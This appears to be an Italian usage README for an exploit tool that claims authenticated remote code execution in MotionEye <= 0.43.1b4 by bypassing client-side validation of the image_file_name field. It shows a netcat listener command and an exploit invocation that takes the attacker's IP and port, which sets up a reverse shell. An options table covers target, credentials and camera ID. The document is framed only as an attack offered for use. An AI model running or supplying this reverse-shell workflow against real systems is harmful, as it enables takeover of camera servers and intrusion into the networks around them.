
RCE autenticata in MotionEye <= 0.43.1b4 tramite bypass della convalida lato client sul campo image_file_name.
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| Opzione | Descrizione |
|---|---|
-t | Host/URL di destinazione (predefinita: porta 8765) |
-u | Nome utente (predefinito: admin) |
-p | Password - stesso valore inserito nella GUI / presente in motion.conf |
-lh | Il tuo IP (dell'attaccante) |
-lp | Porta di ascolto |
--camera-id | ID della telecamera (rilevato automaticamente se omesso) |